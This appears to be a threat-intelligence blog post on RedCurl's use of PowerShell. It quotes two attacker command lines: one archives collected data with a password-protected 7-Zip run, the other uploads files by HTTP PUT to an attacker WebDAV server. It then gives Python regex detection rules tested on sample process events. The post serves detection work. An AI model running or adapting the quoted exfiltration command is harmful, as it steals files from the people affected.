046. RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities
Hello everyone! Let's look at another curious case of PowerShell abuse. This time the adversary used it for data collection and exfiltration.
I took the following examples from the eSentire report on RedCurl (we track this activity cluster as Red Wolf).
The first example shows how the adversary uses 7-Zip to archive collected data:
powershell -c "gci .\*.exe | foreach {if(($_.VersionInfo).InternalName -eq '7za'){$syspack = $_.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"
The second example shows exfiltration of the collected data with PowerShell:
powershell -c "$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .\$env:trdir | Where-Object {$_.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($_.FullName);$AFB = $AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog, $env:spass);$PSW01.Send($AFB);};$PSW01.Close;"
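Both command lines carry tokens that rarely appear together in legitimate administration: a 7-Zip binary located by its VersionInfo InternalName ('7za') and fed a password from an environment variable, and a WebDAV upload built from MSXML2.ServerXMLHTTP plus ADODB.Stream with an HTTP PUT. The following Python script is an added example (not from the original post or the eSentire report) that turns those tokens into two detection rules and runs them over constructed process-creation events shaped like Sysmon Event ID 1 records; the event dicts, field names and rule names are assumptions for the demo, and each rule requires all of its patterns to match so that a single common token such as "gci" cannot fire on its own.

```python
import re

# Indicator patterns derived from the two RedCurl command lines quoted above.
# Rule name -> list of regexes that must ALL match the command line (logical AND).
RULES = {
    "7zip_password_archive_via_versioninfo": [
        r"\.InternalName\s+-eq\s+'7za'",      # locating 7za by its file metadata
        r"'-p'\s*\+\s*\$env:\w+",             # 7-Zip password taken from an env var
    ],
    "webdav_put_exfil_via_msxml_adodb": [
        r"-ComObject\s+MSXML2\.ServerXMLHTTP",  # COM HTTP client from PowerShell
        r"-ComObject\s+ADODB\.Stream",          # binary file read via ADODB
        r"\.Open\(\s*'PUT'",                    # HTTP PUT upload (WebDAV-style)
    ],
}

# Images whose command lines we inspect (process creation events for the PowerShell hosts).
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def match_rules(cmdline: str) -> list:
    """Return the names of all rules whose patterns all match the command line."""
    hits = []
    for name, patterns in RULES.items():
        if all(re.search(p, cmdline, re.IGNORECASE) for p in patterns):
            hits.append(name)
    return hits


def scan_events(events) -> list:
    """Apply the rules to PowerShell process-creation events (Sysmon EID 1 shape, assumed).

    Returns one finding per event that triggered at least one rule.
    """
    findings = []
    for ev in events:
        image = ev.get("Image", "").lower()
        if not image.endswith(POWERSHELL_IMAGES):
            continue  # only PowerShell hosts are in scope for these rules
        hits = match_rules(ev.get("CommandLine", ""))
        if hits:
            findings.append({"ProcessId": ev.get("ProcessId"), "rules": hits})
    return findings


# Constructed sample events: the two command lines from the post plus benign noise.
SAMPLE_EVENTS = [
    {
        "ProcessId": 4100,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell -c "gci .\*.exe | foreach {if(($_.VersionInfo).InternalName -eq '7za'){$syspack = $_.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"''',
    },
    {
        "ProcessId": 4104,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell -c "$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .\$env:trdir | Where-Object {$_.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($_.FullName);$AFB = $AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog, $env:spass);$PSW01.Send($AFB);};$PSW01.Close;"''',
    },
    {
        # Benign: an admin creating a password-protected backup with 7-Zip directly.
        "ProcessId": 4200,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''powershell -c "& 'C:\Program Files\7-Zip\7z.exe' a -pBackupPw backup.7z C:\data"''',
    },
    {
        # Out of scope: same exfil command line, but the image is not a PowerShell host.
        "ProcessId": 4300,
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'''cmd /c echo -ComObject MSXML2.ServerXMLHTTP -ComObject ADODB.Stream .Open('PUT'"''',
    },
]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Command-line matching like this is a starting point, not the whole detection: variable names and environment-variable names can be changed freely, and encoded or split commands would not contain these literal tokens. The same patterns applied to PowerShell Script Block Logging (Event ID 4104), which records the script content after decoding, survive more of that variation; the behavioural pairing of a file-metadata lookup for 7-Zip followed shortly by COM-based HTTP PUT traffic from the same host is the more durable signal.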
PowerShell enables adversaries to solve almost any task, so it is very important to keep tracking the various procedure examples!
See you tomorrow!